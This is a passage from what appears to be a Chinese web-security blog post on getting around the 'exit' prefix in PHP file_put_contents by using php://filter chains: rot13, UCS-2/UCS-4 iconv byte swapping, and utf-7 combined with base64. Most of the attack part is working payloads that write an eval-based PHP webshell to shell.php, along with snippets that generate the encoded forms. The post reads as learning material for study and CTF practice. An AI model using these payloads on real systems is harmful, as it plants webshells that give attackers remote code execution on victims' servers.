<p>针对string.rot13这种Bypass手段，还有另一种方法可以生成正常文件，利用非php:&#x2F;&#x2F;filter参数进行绕过，虽然该方法不存在但是php:&#x2F;&#x2F;filter处理的时候只会显示警告不影响后续的执行<br>	<code>a=php://filter/write=string.rot13|&lt;?cuc @riny($_CBFG[pzq])?&gt;/resource=shell.php</code><br>	这种构造可以使得恶意代码不会存在文件名中，避免了一下文件名因包含特殊字符而出错，当然这种构造在windows下一样可以正常利用。<br><em><strong>convert.iconv.</strong></em><br>	对于iconv字符编码转换进行绕过的手法，其实类似于上面所述的base64编码手段，都是先对原有字符串进行某种编码然后再解码，这个过程导致最初的限制exit;去除，而我们的恶意代码正常解码存储。</p>
<h3 id="UCS-2编码转换"><a href="#UCS-2编码转换" class="headerlink" title="UCS-2编码转换"></a>UCS-2编码转换</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">iconv</span>(<span class="hljs-string">&quot;UCS-2LE&quot;</span>,<span class="hljs-string">&quot;UCS-2BE&quot;</span>,<span class="hljs-string">&#x27;&lt;?php @eval($_POST[bash]);?&gt;&#x27;</span>);<br><br><span class="hljs-comment"># ?&lt;hp pe@av(l_$OPTSb[sa]h;)&gt;?</span><br></code></pre></td></tr></table></figure>

<p>通过UCS-2方式，对目标字符串进行2位一反转（这里的2LE和2BE可以看作是小端和大端的列子），也就是说构造的恶意代码需要是UCS-2中2的倍数，不然不能进行正常反转（多余不满足的字符串会被截断），那我们就	可以利用这种过滤器进行编码转换绕过了<br><code>a=php://filter/convert.iconv.UCS-2LE.UCS-2BE|?&lt;hp pe@av(l_$OPTSb[sa]h;)&gt;?/resource=shell.php</code></p>
<p>组合出的payload：<br><code>&lt;?php exit();php://filter/convert.iconv.UCS-2LE.UCS-2BE|?&lt;hp pe@av(l_$OPTSb[sa]h;)&gt;?/resource=shell.php</code><br>	同样，这里也可以把<strong>UCS-2与rot13组合</strong>起来</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$a</span> = <span class="hljs-title function_ invoke__">iconv</span>(<span class="hljs-string">&quot;UCS-2LE&quot;</span>,<span class="hljs-string">&quot;UCS-2BE&quot;</span>,<span class="hljs-string">&#x27;&lt;?php @eval($_POST[bash]);?&gt;&#x27;</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$a</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;\n&quot;</span>;<br><span class="hljs-variable">$b</span> = <span class="hljs-title function_ invoke__">str_rot13</span>(<span class="hljs-variable">$a</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$b</span>;<br><br><span class="hljs-comment"># ?&lt;hp pe@av(l_$OPTSb[sa]h;)&gt;?</span><br><span class="hljs-comment"># ?&lt;uc cr@ni(y_$BCGFo[fn]u;)&gt;?</span><br></code></pre></td></tr></table></figure>

<p>payload为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plain">$a = &#x27;php://filter/write=convert.iconv.UCS-2LE.UCS-2BE|string.rot13|a?&lt;uc cr@ni(y_$BCGFo[fn]u;)&gt;?/resource=shell.php&#x27;; #同样需要补位，这里补了一个a<br># &lt;?php @eval($_POST[bash]);?&gt;<br></code></pre></td></tr></table></figure>

<h3 id="UCS-4编码转换"><a href="#UCS-4编码转换" class="headerlink" title="UCS-4编码转换"></a>UCS-4编码转换</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">iconv</span>(<span class="hljs-string">&quot;UCS-4LE&quot;</span>,<span class="hljs-string">&quot;UCS-4BE&quot;</span>,<span class="hljs-string">&#x27;&lt;?php @eval($_POST[bash]);?&gt;&#x27;</span>);<br><br><span class="hljs-comment"># hp?&lt;e@ p(lavOP_$b[TS]hsa&gt;?;)</span><br></code></pre></td></tr></table></figure>

<p>通过UCS-4方式，对目标字符串进行4位一反转（这里的4LE和4BE可以看作是小端和大端的列子），也就是说构造的恶意代码需要是UCS-4中4的倍数，不然不能进行正常反转（多余不满足的字符串会被截断），那我们就可以利用这种过滤器进行编码转换绕过了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plain">`a=php://filter/convert.iconv.UCS-4LE.UCS-4BE|hp?&lt;e@ p(lavOP_$b[TS]hsa&gt;?;)/resource=shell.php`<br><br>&amp;emsp;&amp;emsp;组合出的payload：<br>&lt;?php exit();php://filter/convert.iconv.UCS-4LE.UCS-4BE|hp?&lt;e@ p(lavOP_$b[TS]hsa&gt;?;)/resource=shell.php<br></code></pre></td></tr></table></figure>

<p>当然这种方法（UCS-2&#x2F;4）对于上面讲述的第一种情况前后不同变量也是一样适用的。</p>
<h3 id="utf8-utf7"><a href="#utf8-utf7" class="headerlink" title="utf8-utf7"></a>utf8-utf7</h3><p>前面介绍单独用base64编码是不可行的（绕不过字符’&#x3D;’的限制），不过这里可以借助组合拳（iconv+base64）进行绕过字符’&#x3D;’在base64解码中的影响。通过iconv将utf-8编码转为utf-7编码，从而把’&#x3D;’给转了，最终也就不会影响到base64的正常解码。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs plain">`a=php://filter/write=PD9waHAgQGV2YWwoJF9QT1NUW1FmdG1dKT8+|convert.iconv.utf-8.utf-7|convert.base64-decode/resource=shell.php`<br>//这里需要注意的是要符合base64解码按照4字节进行的<br>  <br># 正常base64解码部分<br># +ADwphpexit+ADsphp//filter/write+AD0PD9waHAgQGV2YWwoJF9QT1NUW1FmdG1dKT8+<br># &lt;?php @eval($_POST[Qftm])?&gt;<br></code></pre></td></tr></table></figure>

<p><strong>参考文档</strong>：<br><a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/7758">https://xz.aliyun.com/news/7758</a><br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/linuxsec/articles/12684259.html">https://www.cnblogs.com/linuxsec/articles/12684259.html</a><br><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/php-filter-magic.html">https://www.leavesongs.com/PENETRATION/php-filter-magic.html</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/web%E5%AD%A6%E4%B9%A0/" class="category-chain-item">web学习</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/web/" class="print-no-link">#web</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>file_put_content死亡杂糅</div>
      <div>https://kivvs.github.io/2026/08/14/file_put_content死亡杂糅/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>kivvs</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年8月14日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2026/08/14/web%E5%AE%89%E5%85%A8%E4%B9%8Bpearcmd-php%E7%9A%84%E5%88%A9%E7%94%A8/" title="web安全之pearcmd.php的利用">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">web安全之pearcmd.php的利用</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
    <div id="giscus" class="giscus"></div>
    <script type="text/javascript">
      Fluid.utils.loadComments('#giscus', function() {
        var options = {"repo":"kivvs/kivvs.github.io","repo-id":"R_kgDOT3J6Jg","category":"Announcements","category-id":"DIC_kwDOT3J6Js4DDSMc","theme-light":"light","theme-dark":"dark","mapping":"pathname","reactions-enabled":1,"emit-metadata":0,"input-position":"top","lang":"zh-CN"};
        var attributes = {};
        for (let option in options) {
          if (!option.startsWith('theme-')) {
            var key = option.startsWith('data-') ? option : 'data-' + option;
            attributes[key] = options[option];
          }
        }
        var light = 'light';
        var dark = 'dark';
        window.GiscusThemeLight = light;
        window.GiscusThemeDark = dark;
        attributes['data-theme'] = document.documentElement.getAttribute('data-user-color-scheme') === 'dark' ? dark : light;
        for (let attribute in attributes) {
          var value = attributes[attribute];
          if (value === undefined || value === null || value === '') {
            delete attributes[attribute];
          }
        }
        var s = document.createElement('script');
        s.setAttribute('src', 'https://giscus.app/client.js');
        s.setAttribute('crossorigin', 'anonymous');
        for (let attribute in attributes) {
          s.setAttribute(attribute, attributes[attribute]);
        }
        var ss = document.getElementsByTagName('script');
        var e = ss.length > 0 ? ss[ss.length - 1] : document.head || document.documentElement;
        e.parentNode.insertBefore(s, e.nextSibling);
      });
    </script>
    <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid- /hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    function isExpandAllEnabled() {
      return CONFIG.toc && CONFIG.toc.expand_all === true;
    }
    function expandAllToc() {
      if (!isExpandAllEnabled()) { return; }
      jQuery('#toc-body .tocbot-is-collapsed').removeClass('tocbot-is-collapsed');
    }
    function updateTocToggle($li, $childList) {
      var $toggle = $li.children('.toc-toggle');
      if ($toggle.length === 0) { return; }
      var collapsed = $childList.hasClass('tocbot-is-collapsed');
      $toggle
        .toggleClass('toc-toggle-collapsed', collapsed)
        .toggleClass('toc-toggle-expanded', !collapsed);
    }
    function bindTocToggle() {
      if (!isExpandAllEnabled()) { return; }
      jQuery('#toc-body .toc-list-item').each(function() {
        var $li = jQuery(this);
        var $childList = $li.children('ol');
        if ($childList.length === 0) {
          if ($li.children('.toc-toggle').length === 0) {
            $li.prepend('<span class="toc-toggle toc-toggle-placeholder" aria-hidden="true">›</span>');
          }
          return;
        }

        if ($li.children('.toc-toggle').length === 0) {
          $li.prepend('<span class="toc-toggle toc-toggle-expanded" aria-hidden="true">›</span>');
        }
        updateTocToggle($li, $childList);
      });
      jQuery('#toc-body').off('click.tocToggle').on('click.tocToggle', '.toc-toggle', function(e) {
        e.preventDefault();
        e.stopPropagation();
        var $li = jQuery(this).parent('.toc-list-item');
        var $childList = $li.children('ol');
        if ($childList.length === 0) { return; }
        $childList.toggleClass('tocbot-is-collapsed');
        updateTocToggle($li, $childList);
      });
      if (!window.__tocToggleObserver) {
        window.__tocToggleObserver = new MutationObserver(function(mutations) {
          mutations.forEach(function(mutation) {
            if (mutation.type !== 'attributes' || mutation.attributeName !== 'class') { return; }
            var $list = jQuery(mutation.target);
            var $li = $list.parent('.toc-list-item');
            if ($li.length === 0) { return; }
            updateTocToggle($li, $list);
          });
        });
        jQuery('#toc-body ol').each(function() {
          window.__tocToggleObserver.observe(this, { attributes: true });
        });
      }
    }
    var tocConfig = Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc);
    if (isExpandAllEnabled()) {
      tocConfig.collapseDepth = 6;
    }
    window.tocbot.init(tocConfig);
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
    expandAllToc();
    bindTocToggle();

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
        expandAllToc();
        bindTocToggle();
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/openkounter.js" ></script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
